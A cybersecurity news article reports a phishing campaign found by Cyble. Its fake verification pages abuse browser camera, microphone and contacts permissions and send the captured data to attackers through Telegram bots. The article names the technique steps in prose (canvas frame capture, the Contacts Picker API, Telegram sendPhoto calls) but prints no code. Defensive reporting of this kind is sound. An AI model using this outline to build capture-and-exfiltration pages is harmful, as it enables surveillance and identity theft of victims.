Cyble Research & Intelligence Labs has identified a sophisticated AI-powered phishing campaign that marks a significant shift from traditional credential theft tactics to more invasive, technology-driven attacks.

Active since early 2026, the campaign uses a variety of social engineering themes such as “ID scanner,” “Telegram ID freezing,” and “Health Fund AI” to lure victims. These deceptive prompts are designed to trick users into granting access to sensitive device permissions, including cameras and microphones, under the pretense of verification or account recovery.

Once access is granted, malicious scripts begin harvesting extensive data. This includes images, video recordings, microphone audio, device specifications, contact details, and approximate geolocation. The stolen data is quickly transmitted to attacker-controlled systems via Telegram bots, enabling fast and efficient exfiltration. Researchers also observed clear indicators of AI-assisted code development within the campaign. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest that generative AI tools are being used to streamline malware creation and deployment.

The phishing infrastructure relies heavily on the edgeone.app platform, allowing attackers to deploy scalable and cost-effective phishing pages. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, Google Chrome, and even games like Flappy Bird to build trust and increase user engagement. Unlike conventional phishing attacks that rely on stealing login credentials, this campaign focuses on exploiting browser-level permissions. When a user interacts with a malicious page, embedded JavaScript triggers permission requests. If approved, the script activates the device’s camera and begins capturing live data.

A key technique involves capturing frames from live video streams using HTML5 canvas functions like drawImage() and converting them into image files via toBlob(). These files are then immediately sent to attackers using Telegram Bot APIs. Similar methods are used to capture audio and video recordings. Through these methods, attackers gather detailed insights into the victim’s device, including operating system, browser version, CPU performance, RAM, network type, and battery status. The script also retrieves the victim’s IP address and enriches it with geolocation data such as country, city, latitude, and longitude.

Ad Banner

Additionally, the campaign attempts to access user contacts via the browser’s Contacts Picker API. If permission is granted, names, phone numbers, and email addresses are extracted and transmitted to cyberattackers. A notable feature of this operation is its reliance on Telegram for command-and-control (C2) infrastructure. By leveraging Telegram bots and API methods like sendPhoto, sendVideo, and sendAudio, attackers eliminate the need for complex backend systems while gaining instant access to stolen data.

To maintain legitimacy, phishing pages display realistic status messages such as “Capturing photo” and “Sending to server,” mimicking genuine verification processes. After data collection, the script disables the camera and resets the interface, leaving minimal evidence of the attack.

The implications of this campaign are severe. By capturing biometric and contextual data, attackers can:

  • Conduct identity theft and account takeovers

  • Bypass video-based verification and KYC systems

  • Launch highly targeted social engineering attacks

  • Carry out extortion using recorded media

The use of AI in this campaign highlights a growing trend where threat actors leverage automation to scale operations and increase attack sophistication. Organizations face heightened risks, including reputational damage, regulatory consequences, and financial loss especially when trusted brands are impersonated. This campaign underscores the urgent need for stronger user awareness, stricter permission controls, and enhanced browser security measures to counter next-generation phishing threats.

Recommended Cyber News:

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com 



🔒 Login or Register to continue reading